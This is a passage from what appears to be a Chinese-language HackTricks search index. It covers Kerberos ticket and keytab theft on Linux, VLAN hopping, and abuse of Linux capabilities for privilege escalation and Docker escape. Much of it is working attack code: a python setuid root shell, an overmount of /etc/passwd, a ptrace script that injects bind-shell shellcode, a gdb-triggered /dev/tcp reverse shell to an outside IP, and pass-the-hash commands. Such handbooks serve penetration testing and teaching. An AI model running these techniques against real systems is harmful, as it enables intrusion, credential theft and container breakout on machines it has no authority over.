重用 CCACHE 票证","id":"1823","title":"从 /tmp 重用 CCACHE 票证"},"1824":{"body":"存储在进程内存中的 Kerberos 票据可以被提取 ,特别是在机器的 ptrace 保护被禁用时(/proc/sys/kernel/yama/ptrace_scope)。一个有用的工具可以在 https://github.com/TarlogicSecurity/tickey 找到,它通过注入会话并将票据转储到 /tmp 来方便提取。 要配置和使用此工具,请按照以下步骤进行: bash git clone https://github.com/TarlogicSecurity/tickey\\ncd tickey/tickey\\nmake CONF=Release\\n/tmp/tickey -i 此过程将尝试注入到各种会话中,通过将提取的票证存储在 /tmp 中,命名约定为 __krb_UID.ccache 来指示成功。","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » CCACHE 票据重用来自密钥环","id":"1824","title":"CCACHE 票据重用来自密钥环"},"1825":{"body":"SSSD在路径 /var/lib/sss/secrets/secrets.ldb 处维护数据库的副本。相应的密钥存储为隐藏文件,路径为 /var/lib/sss/secrets/.secrets.mkey。默认情况下,只有在您具有 root 权限时,才能读取该密钥。 使用 SSSDKCMExtractor 及 --database 和 --key 参数将解析数据库并 解密秘密 。 bash git clone https://github.com/fireeye/SSSDKCMExtractor\\npython3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey 凭证缓存 Kerberos blob 可以转换为可用的 Kerberos CCache 文件,可以传递给 Mimikatz/Rubeus。","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 来自SSSD KCM的CCACHE票证重用","id":"1825","title":"来自SSSD KCM的CCACHE票证重用"},"1826":{"body":"bash git clone https://github.com/its-a-feature/KeytabParser\\npython KeytabParser.py /etc/krb5.keytab\\nklist -k /etc/krb5.keytab","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 从 keytab 重用 CCACHE 票证","id":"1826","title":"从 keytab 重用 CCACHE 票证"},"1827":{"body":"服务账户密钥,对于以 root 权限运行的服务至关重要,安全地存储在 /etc/krb5.keytab 文件中。这些密钥类似于服务的密码,要求严格保密。 要检查 keytab 文件的内容,可以使用 klist 。该工具旨在显示密钥详细信息,包括用户身份验证的 NT Hash ,特别是当密钥类型被识别为 23 时。 bash klist.exe -t -K -e -k FILE:C:/Path/to/your/krb5.keytab\\n# Output includes service principal details and the NT Hash 对于Linux用户, KeyTabExtract 提供了提取RC4 HMAC哈希的功能,这可以用于NTLM哈希重用。 bash python3 keytabextract.py krb5.keytab\\n# Expected output varies based on hash availability 在 macOS 上, bifrost 作为一个工具用于 keytab 文件分析。 bash ./bifrost -action dump -source keytab -path /path/to/your/file 利用提取的账户和哈希信息,可以使用工具如 crackmapexec 建立与服务器的连接。 bash crackmapexec 10.XXX.XXX.XXX -u \'ServiceAccount$\' -H \\"HashPlaceholder\\" -d \\"YourDOMAIN\\"","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 从 /etc/krb5.keytab 提取账户","id":"1827","title":"从 /etc/krb5.keytab 提取账户"},"1828":{"body":"https://www.tarlogic.com/blog/how-to-attack-kerberos/ https://github.com/TarlogicSecurity/tickey https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 参考","id":"1828","title":"参考"},"1829":{"body":"Reading time: 62 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » Linux Capabilities","id":"1829","title":"Linux Capabilities"},"183":{"body":"启用DTP的Cisco交换机会乐于协商干线,如果对端声称是交换机。构造一个**DTP “desirable” 或 “trunk”**帧将接入端口转换为一个802.1Q干线,承载 所有 允许的VLAN。 Yersinia 和几个PoC自动化了这个过程: bash # Become a trunk using Yersinia (GUI)\\nsudo yersinia -G # Launch GUI → Launch attack → DTP → enabling trunking # Python PoC (dtp-spoof)\\ngit clone https://github.com/fleetcaptain/dtp-spoof.git\\nsudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable 侦察助手(被动指纹识别端口的 DTP 状态): bash sudo modprobe 8021q\\nsudo ip link add link eth0 name eth0.30 type vlan id 30\\nsudo ip addr add 10.10.30.66/24 dev eth0.30\\nsudo ip link set eth0.30 up # or wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py\\nsudo python3 dtpscan.py -i eth0 一旦端口切换到 trunk,您可以创建 802.1Q 子接口,并按照上一节所示进行 pivot。","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 1. 使用动态干线协议(DTP)进行交换机欺骗","id":"183","title":"1. 使用动态干线协议(DTP)进行交换机欺骗"},"1830":{"body":"Linux capabilities 将 root 权限划分为更小、独立的单元 ,允许进程拥有一部分权限。这通过不必要地授予完整的 root 权限来最小化风险。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » Linux Capabilities","id":"1830","title":"Linux Capabilities"},"1831":{"body":"普通用户的权限有限,影响诸如打开需要 root 访问的网络套接字等任务。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 问题:","id":"1831","title":"问题:"},"1832":{"body":"Inherited (CapInh) : 目的 :确定从父进程传递下来的权限。 功能 :当创建新进程时,它从其父进程继承此集合中的权限。对于在进程生成中维护某些权限非常有用。 限制 :进程不能获得其父进程未拥有的权限。 Effective (CapEff) : 目的 :表示进程在任何时刻实际使用的权限。 功能 :这是内核检查以授予各种操作权限的权限集合。对于文件,这个集合可以是一个标志,指示文件的允许权限是否被视为有效。 重要性 :有效集合对于即时权限检查至关重要,充当进程可以使用的活动权限集合。 Permitted (CapPrm) : 目的 :定义进程可以拥有的最大权限集合。 功能 :进程可以将权限从允许集合提升到其有效集合,从而使其能够使用该权限。它还可以从其允许集合中删除权限。 边界 :它作为进程可以拥有的权限的上限,确保进程不会超过其预定义的权限范围。 Bounding (CapBnd) : 目的 :对进程在其生命周期内可以获得的权限设置上限。 功能 :即使进程在其可继承或允许集合中具有某个权限,除非它也在边界集合中,否则无法获得该权限。 用例 :此集合特别有助于限制进程的权限提升潜力,增加额外的安全层。 Ambient (CapAmb) : 目的 :允许某些权限在 execve 系统调用中保持,这通常会导致进程权限的完全重置。 功能 :确保没有关联文件权限的非 SUID 程序可以保留某些权限。 限制 :此集合中的权限受可继承和允许集合的约束,确保它们不超过进程的允许权限。 python # Code to demonstrate the interaction of different capability sets might look like this:\\n# Note: This is pseudo-code for illustrative purposes only.\\ndef manage_capabilities(process):\\nif process.has_capability(\'cap_setpcap\'):\\nprocess.add_capability_to_set(\'CapPrm\', \'new_capability\')\\nprocess.limit_capabilities(\'CapBnd\')\\nprocess.preserve_capabilities_across_execve(\'CapAmb\') 有关更多信息,请查看: https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work https://blog.ploetzli.ch/2014/understanding-linux-capabilities/","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 权限集:","id":"1832","title":"权限集:"},"1833":{"body":"","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 进程与二进制文件的能力","id":"1833","title":"进程与二进制文件的能力"},"1834":{"body":"要查看特定进程的能力,请使用 /proc 目录中的 status 文件。由于它提供了更多细节,我们将其限制为与 Linux 能力相关的信息。 请注意,对于所有正在运行的进程,能力信息是按线程维护的,对于文件系统中的二进制文件,它存储在扩展属性中。 您可以在 /usr/include/linux/capability.h 中找到定义的能力。 您可以在 cat /proc/self/status 中找到当前进程的能力,或通过 capsh --print 查看其他用户的能力在 /proc//status 中。 bash cat /proc/1234/status | grep Cap\\ncat /proc/$$/status | grep Cap #This will print the capabilities of the current process 此命令在大多数系统上应返回 5 行。 CapInh = 继承的能力 CapPrm = 允许的能力 CapEff = 有效的能力 CapBnd = 边界集 CapAmb = 环境能力集 bash #These are the typical capabilities of a root owned process (all)\\nCapInh: 0000000000000000\\nCapPrm: 0000003fffffffff\\nCapEff: 0000003fffffffff\\nCapBnd: 0000003fffffffff\\nCapAmb: 0000000000000000 这些十六进制数字没有意义。使用 capsh 工具,我们可以将它们解码为能力名称。 bash capsh --decode=0000003fffffffff\\n0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37 现在让我们检查一下 ping 使用的 capabilities : bash cat /proc/9491/status | grep Cap\\nCapInh: 0000000000000000\\nCapPrm: 0000000000003000\\nCapEff: 0000000000000000\\nCapBnd: 0000003fffffffff\\nCapAmb: 0000000000000000 capsh --decode=0000000000003000\\n0x0000000000003000=cap_net_admin,cap_net_raw 虽然这样可以工作,但还有另一种更简单的方法。要查看正在运行的进程的能力,只需使用 getpcaps 工具,后面跟上其进程 ID (PID)。您还可以提供一个进程 ID 列表。 bash getpcaps 1234 让我们检查一下 tcpdump 的能力,在给二进制文件足够的能力(cap_net_admin 和 cap_net_raw)以嗅探网络之后( tcpdump 正在进程 9562 中运行 ): bash #The following command give tcpdump the needed capabilities to sniff traffic\\n$ setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump $ getpcaps 9562\\nCapabilities for `9562\': = cap_net_admin,cap_net_raw+ep $ cat /proc/9562/status | grep Cap\\nCapInh: 0000000000000000\\nCapPrm: 0000000000003000\\nCapEff: 0000000000003000\\nCapBnd: 0000003fffffffff\\nCapAmb: 0000000000000000 $ capsh --decode=0000000000003000\\n0x0000000000003000=cap_net_admin,cap_net_raw 如您所见,给定的能力与获取二进制文件能力的两种方式的结果相对应。 getpcaps 工具使用 capget() 系统调用查询特定线程的可用能力。此系统调用只需提供 PID 即可获取更多信息。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 进程能力","id":"1834","title":"进程能力"},"1835":{"body":"二进制文件可以具有在执行时可以使用的能力。例如,常见的情况是找到具有 cap_net_raw 能力的 ping 二进制文件: bash getcap /usr/bin/ping\\n/usr/bin/ping = cap_net_raw+ep 您可以使用以下方法 搜索具有能力的二进制文件 : bash getcap -r / 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 二进制文件能力","id":"1835","title":"二进制文件能力"},"1836":{"body":"如果我们为 _ping* 删除 CAP*NET_RAW 能力,那么 ping 工具将不再工作。 bash capsh --drop=cap_net_raw --print -- -c \\"tcpdump\\" 除了_capsh_本身的输出,_tcpdump_命令本身也应该引发错误。 /bin/bash: /usr/sbin/tcpdump: 操作不允许 错误清楚地表明,ping命令不允许打开ICMP套接字。现在我们可以确定这按预期工作。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » Dropping capabilities with capsh","id":"1836","title":"Dropping capabilities with capsh"},"1837":{"body":"您可以通过以下方式移除二进制文件的能力: bash setcap -r ","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 移除能力","id":"1837","title":"移除能力"},"1838":{"body":"显然 也可以将能力分配给用户 。这可能意味着用户执行的每个进程都将能够使用用户的能力。 根据 这个 、 这个 和 这个 的内容,需要配置一些文件以赋予用户某些能力,但分配能力给每个用户的文件将是/etc/security/capability.conf。 文件示例: bash # Simple\\ncap_sys_ptrace developer\\ncap_net_raw user1 # Multiple capablities\\ncap_net_admin,cap_net_raw jrnetadmin\\n# Identical, but with numeric values\\n12,13 jrnetadmin # Combining names and numerics\\ncap_sys_admin,22,25 jrsysadmin","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 用户能力","id":"1838","title":"用户能力"},"1839":{"body":"编译以下程序可以 在提供能力的环境中生成一个bash shell 。 ambient.c /*\\n* Test program for the ambient capabilities\\n*\\n* compile using:\\n* gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c\\n* Set effective, inherited and permitted capabilities to the compiled binary\\n* sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient\\n*\\n* To get a shell with additional caps that can be inherited do:\\n*\\n* ./ambient /bin/bash\\n*/ #include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include static void set_ambient_cap(int cap) {\\nint rc;\\ncapng_get_caps_process();\\nrc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap);\\nif (rc) {\\nprintf(\\"Cannot add inheritable cap\\\\n\\");\\nexit(2);\\n}\\ncapng_apply(CAPNG_SELECT_CAPS);\\n/* Note the two 0s at the end. Kernel checks for these */\\nif (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) {\\nperror(\\"Cannot set cap\\");\\nexit(1);\\n}\\n}\\nvoid usage(const char * me) {\\nprintf(\\"Usage: %s [-c caps] new-program new-args\\\\n\\", me);\\nexit(1);\\n}\\nint default_caplist[] = {\\nCAP_NET_RAW,\\nCAP_NET_ADMIN,\\nCAP_SYS_NICE,\\n-1\\n};\\nint * get_caplist(const char * arg) {\\nint i = 1;\\nint * list = NULL;\\nchar * dup = strdup(arg), * tok;\\nfor (tok = strtok(dup, \\",\\"); tok; tok = strtok(NULL, \\",\\")) {\\nlist = realloc(list, (i + 1) * sizeof(int));\\nif (!list) {\\nperror(\\"out of memory\\");\\nexit(1);\\n}\\nlist[i - 1] = atoi(tok);\\nlist[i] = -1;\\ni++;\\n}\\nreturn list;\\n}\\nint main(int argc, char ** argv) {\\nint rc, i, gotcaps = 0;\\nint * caplist = NULL;\\nint index = 1; // argv index for cmd to start\\nif (argc < 2)\\nusage(argv[0]);\\nif (strcmp(argv[1], \\"-c\\") == 0) {\\nif (argc <= 3) {\\nusage(argv[0]);\\n}\\ncaplist = get_caplist(argv[2]);\\nindex = 3;\\n}\\nif (!caplist) {\\ncaplist = (int * ) default_caplist;\\n}\\nfor (i = 0; caplist[i] != -1; i++) {\\nprintf(\\"adding %d to ambient list\\\\n\\", caplist[i]);\\nset_ambient_cap(caplist[i]);\\n}\\nprintf(\\"Ambient forking shell\\\\n\\");\\nif (execv(argv[index], argv + index))\\nperror(\\"Cannot exec\\");\\nreturn 0;\\n} bash gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c\\nsudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient\\n./ambient /bin/bash 在 由编译的环境二进制文件执行的bash内部 ,可以观察到 新的能力 (普通用户在“当前”部分不会有任何能力)。 bash capsh --print\\nCurrent: = cap_net_admin,cap_net_raw,cap_sys_nice+eip caution 你 只能添加在 允许和继承集合中 存在的能力 。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » Environment Capabilities","id":"1839","title":"Environment Capabilities"},"184":{"body":"如果攻击者位于 native (untagged) VLAN ,则带有 两个 802.1Q 头的构造帧可以跳转到第二个 VLAN,即使端口被锁定在接入模式。 工具如 VLANPWN DoubleTagging.py (2022-2025 刷新) 自动化了注入: bash python3 DoubleTagging.py \\\\\\n--interface eth0 \\\\\\n--nativevlan 1 \\\\\\n--targetvlan 20 \\\\\\n--victim 10.10.20.24 \\\\\\n--attacker 10.10.1.54","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 2. 双重标记 (Native-VLAN 滥用)","id":"184","title":"2. 双重标记 (Native-VLAN 滥用)"},"1840":{"body":"能力感知的二进制文件不会使用环境中提供的新能力 ,然而 能力无知的二进制文件会使用它们 ,因为它们不会拒绝这些能力。这使得能力无知的二进制文件在一个授予二进制文件能力的特殊环境中变得脆弱。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 能力感知/能力无知的二进制文件","id":"1840","title":"能力感知/能力无知的二进制文件"},"1841":{"body":"默认情况下, 以root身份运行的服务将被分配所有能力 ,在某些情况下这可能是危险的。 因此, 服务配置 文件允许 指定 你希望它拥有的 能力 , 以及 应该执行该服务的 用户 ,以避免以不必要的权限运行服务: bash [Service]\\nUser=bob\\nAmbientCapabilities=CAP_NET_BIND_SERVICE","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 服务能力","id":"1841","title":"服务能力"},"1842":{"body":"默认情况下,Docker 为容器分配了一些能力。通过运行以下命令,可以很容易地检查这些能力: bash docker run --rm -it r.j3ss.co/amicontained bash\\nCapabilities:\\nBOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap # Add a capabilities\\ndocker run --rm -it --cap-add=SYS_ADMIN r.j3ss.co/amicontained bash # Add all capabilities\\ndocker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash # Remove all and add only one\\ndocker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » Docker 容器中的能力","id":"1842","title":"Docker 容器中的能力"},"1843":{"body":"Capabilities 在你 想要在执行特权操作后限制自己的进程 (例如,在设置 chroot 和绑定到套接字后)时非常有用。然而,它们可以通过传递恶意命令或参数来被利用,这些命令或参数随后以 root 身份运行。 你可以使用 setcap 强制程序获得能力,并使用 getcap 查询这些能力: bash #Set Capability\\nsetcap cap_net_raw+ep /sbin/ping #Get Capability\\ngetcap /sbin/ping\\n/sbin/ping = cap_net_raw+ep +ep 表示您正在将能力添加为有效和允许(“-”将移除它)。 要识别系统或文件夹中具有能力的程序: bash getcap -r / 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » Privesc/Container Escape","id":"1843","title":"Privesc/Container Escape"},"1844":{"body":"在以下示例中,发现二进制文件 /usr/bin/python2.6 存在提权漏洞: bash setcap cap_setuid+ep /usr/bin/python2.7\\n/usr/bin/python2.7 = cap_setuid+ep #Exploit\\n/usr/bin/python2.7 -c \'import os; os.setuid(0); os.system(\\"/bin/bash\\");\' tcpdump 所需的 能力 以 允许任何用户嗅探数据包 : bash setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump\\ngetcap /usr/sbin/tcpdump\\n/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 利用示例","id":"1844","title":"利用示例"},"1845":{"body":"来自文档 :请注意,可以将空能力集分配给程序文件,因此可以创建一个设置用户ID为root的程序,该程序将执行该程序的进程的有效和保存的用户ID更改为0,但不会赋予该进程任何能力。简单来说,如果你有一个二进制文件: 不属于root 没有设置 SUID/SGID 位 设置了空能力(例如:getcap myelf 返回 myelf =ep) 那么 该二进制文件将以root身份运行 。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » \\"空\\" 能力的特殊情况","id":"1845","title":"\\"空\\" 能力的特殊情况"},"1846":{"body":"CAP_SYS_ADMIN 是一种非常强大的Linux能力,通常被视为接近root级别,因为它具有广泛的 管理权限 ,例如挂载设备或操纵内核特性。虽然在模拟整个系统的容器中不可或缺,但**CAP_SYS_ADMIN 带来了重大的安全挑战**,特别是在容器化环境中,因为它可能导致特权提升和系统妥协。因此,其使用需要严格的安全评估和谨慎管理,强烈建议在特定应用的容器中放弃此能力,以遵循 最小特权原则 并最小化攻击面。 带有二进制文件的示例 bash getcap -r / 2>/dev/null\\n/usr/bin/python2.7 = cap_sys_admin+ep 使用 Python,您可以将修改过的 passwd 文件挂载到真实的 passwd 文件上: bash cp /etc/passwd ./ #Create a copy of the passwd file\\nopenssl passwd -1 -salt abc password #Get hash of \\"password\\"\\nvim ./passwd #Change roots passwords of the fake passwd file 最后 挂载 修改后的 passwd 文件到 /etc/passwd: python from ctypes import *\\nlibc = CDLL(\\"libc.so.6\\")\\nlibc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)\\nMS_BIND = 4096\\nsource = b\\"/path/to/fake/passwd\\"\\ntarget = b\\"/etc/passwd\\"\\nfilesystemtype = b\\"none\\"\\noptions = b\\"rw\\"\\nmountflags = MS_BIND\\nlibc.mount(source, target, filesystemtype, mountflags, options) 您将能够 su 为 root ,使用密码 \\"password\\"。 带环境的示例(Docker 突破) 您可以使用以下命令检查 Docker 容器内启用的能力: capsh --print\\nCurrent: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep\\nBounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read\\nSecurebits: 00/0x0/1\'b0\\nsecure-noroot: no (unlocked)\\nsecure-no-suid-fixup: no (unlocked)\\nsecure-keep-caps: no (unlocked)\\nuid=0(root)\\ngid=0(root)\\ngroups=0(root) 在之前的输出中,您可以看到 SYS_ADMIN 能力已启用。 挂载 这允许 docker 容器 挂载主机磁盘并自由访问 : bash fdisk -l #Get disk name\\nDisk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors\\nUnits: sectors of 1 * 512 = 512 bytes\\nSector size (logical/physical): 512 bytes / 512 bytes\\nI/O size (minimum/optimal): 512 bytes / 512 bytes mount /dev/sda /mnt/ #Mount it\\ncd /mnt\\nchroot ./ bash #You have a shell inside the docker hosts disk 完全访问 在之前的方法中,我们成功访问了docker主机磁盘。 如果您发现主机正在运行 ssh 服务器,您可以 在docker主机 磁盘中创建一个用户,并通过SSH访问它: bash #Like in the example before, the first step is to mount the docker host disk\\nfdisk -l\\nmount /dev/sda /mnt/ #Then, search for open ports inside the docker host\\nnc -v -n -w2 -z 172.17.0.1 1-65535\\n(UNKNOWN) [172.17.0.1] 2222 (?) open #Finally, create a new user inside the docker host and use it to access via SSH\\nchroot /mnt/ adduser john\\nssh john@172.17.0.1 -p 2222","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYS_ADMIN","id":"1846","title":"CAP_SYS_ADMIN"},"1847":{"body":"这意味着您可以通过在主机上运行的某个进程中注入 shellcode 来逃离容器。 要访问主机上运行的进程,容器需要至少以 --pid=host 运行。 CAP_SYS_PTRACE 授予使用 ptrace(2) 提供的调试和系统调用跟踪功能的能力,以及像 process_vm_readv(2) 和 process_vm_writev(2) 这样的跨内存附加调用。尽管对于诊断和监控目的非常强大,但如果在没有像 seccomp 过滤器这样的限制措施的情况下启用 CAP_SYS_PTRACE,可能会显著削弱系统安全性。具体来说,它可以被利用来规避其他安全限制,特别是 seccomp 强加的限制,正如 这样的概念验证 (PoC) 所示。 使用二进制文件的示例 (python) bash getcap -r / 2>/dev/null\\n/usr/bin/python2.7 = cap_sys_ptrace+ep python import ctypes\\nimport sys\\nimport struct\\n# Macros defined in \\n# https://code.woboq.org/qt5/include/sys/ptrace.h.html\\nPTRACE_POKETEXT = 4\\nPTRACE_GETREGS = 12\\nPTRACE_SETREGS = 13\\nPTRACE_ATTACH = 16\\nPTRACE_DETACH = 17\\n# Structure defined in \\n# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct\\nclass user_regs_struct(ctypes.Structure):\\n_fields_ = [\\n(\\"r15\\", ctypes.c_ulonglong),\\n(\\"r14\\", ctypes.c_ulonglong),\\n(\\"r13\\", ctypes.c_ulonglong),\\n(\\"r12\\", ctypes.c_ulonglong),\\n(\\"rbp\\", ctypes.c_ulonglong),\\n(\\"rbx\\", ctypes.c_ulonglong),\\n(\\"r11\\", ctypes.c_ulonglong),\\n(\\"r10\\", ctypes.c_ulonglong),\\n(\\"r9\\", ctypes.c_ulonglong),\\n(\\"r8\\", ctypes.c_ulonglong),\\n(\\"rax\\", ctypes.c_ulonglong),\\n(\\"rcx\\", ctypes.c_ulonglong),\\n(\\"rdx\\", ctypes.c_ulonglong),\\n(\\"rsi\\", ctypes.c_ulonglong),\\n(\\"rdi\\", ctypes.c_ulonglong),\\n(\\"orig_rax\\", ctypes.c_ulonglong),\\n(\\"rip\\", ctypes.c_ulonglong),\\n(\\"cs\\", ctypes.c_ulonglong),\\n(\\"eflags\\", ctypes.c_ulonglong),\\n(\\"rsp\\", ctypes.c_ulonglong),\\n(\\"ss\\", ctypes.c_ulonglong),\\n(\\"fs_base\\", ctypes.c_ulonglong),\\n(\\"gs_base\\", ctypes.c_ulonglong),\\n(\\"ds\\", ctypes.c_ulonglong),\\n(\\"es\\", ctypes.c_ulonglong),\\n(\\"fs\\", ctypes.c_ulonglong),\\n(\\"gs\\", ctypes.c_ulonglong),\\n] libc = ctypes.CDLL(\\"libc.so.6\\") pid=int(sys.argv[1]) # Define argument type and respone type.\\nlibc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]\\nlibc.ptrace.restype = ctypes.c_uint64 # Attach to the process\\nlibc.ptrace(PTRACE_ATTACH, pid, None, None)\\nregisters=user_regs_struct() # Retrieve the value stored in registers\\nlibc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))\\nprint(\\"Instruction Pointer: \\" + hex(registers.rip))\\nprint(\\"Injecting Shellcode at: \\" + hex(registers.rip)) # Shell code copied from exploit db. https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c\\nshellcode = \\"\\\\x48\\\\x31\\\\xc0\\\\x48\\\\x31\\\\xd2\\\\x48\\\\x31\\\\xf6\\\\xff\\\\xc6\\\\x6a\\\\x29\\\\x58\\\\x6a\\\\x02\\\\x5f\\\\x0f\\\\x05\\\\x48\\\\x97\\\\x6a\\\\x02\\\\x66\\\\xc7\\\\x44\\\\x24\\\\x02\\\\x15\\\\xe0\\\\x54\\\\x5e\\\\x52\\\\x6a\\\\x31\\\\x58\\\\x6a\\\\x10\\\\x5a\\\\x0f\\\\x05\\\\x5e\\\\x6a\\\\x32\\\\x58\\\\x0f\\\\x05\\\\x6a\\\\x2b\\\\x58\\\\x0f\\\\x05\\\\x48\\\\x97\\\\x6a\\\\x03\\\\x5e\\\\xff\\\\xce\\\\xb0\\\\x21\\\\x0f\\\\x05\\\\x75\\\\xf8\\\\xf7\\\\xe6\\\\x52\\\\x48\\\\xbb\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x53\\\\x48\\\\x8d\\\\x3c\\\\x24\\\\xb0\\\\x3b\\\\x0f\\\\x05\\" # Inject the shellcode into the running process byte by byte.\\nfor i in xrange(0,len(shellcode),4):\\n# Convert the byte to little endian.\\nshellcode_byte_int=int(shellcode[i:4+i].encode(\'hex\'),16)\\nshellcode_byte_little_endian=struct.pack(\\" commands.gdb\\n# In this case there was a sleep run by root\\n## NOTE that the process you abuse will die after the shellcode\\n/usr/bin/gdb -p $(pgrep sleep)\\n[...]\\n(gdb) source commands.gdb\\nContinuing.\\nprocess 207009 is executing new program: /usr/bin/dash\\n[...] 带环境的示例(Docker 突破) - 另一个 gdb 滥用 如果 GDB 已安装(或者你可以通过 apk add gdb 或 apt install gdb 等安装它),你可以 从主机调试一个进程 并使其调用 system 函数。(此技术还需要能力 SYS_ADMIN) 。 bash gdb -p 1234\\n(gdb) call (void)system(\\"ls\\")\\n(gdb) call (void)system(\\"sleep 5\\")\\n(gdb) call (void)system(\\"bash -c \'bash -i >& /dev/tcp/192.168.115.135/5656 0>&1\'\\") 您将无法看到执行命令的输出,但该进程将执行该命令(因此获取反向 shell)。 warning 如果您收到错误 \\"No symbol \\"system\\" in current context.\\",请检查通过 gdb 在程序中加载 shellcode 的前一个示例。 带环境的示例(Docker 逃逸) - Shellcode 注入 您可以使用以下命令检查 docker 容器内启用的能力: bash capsh --print\\nCurrent: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap+ep\\nBounding set 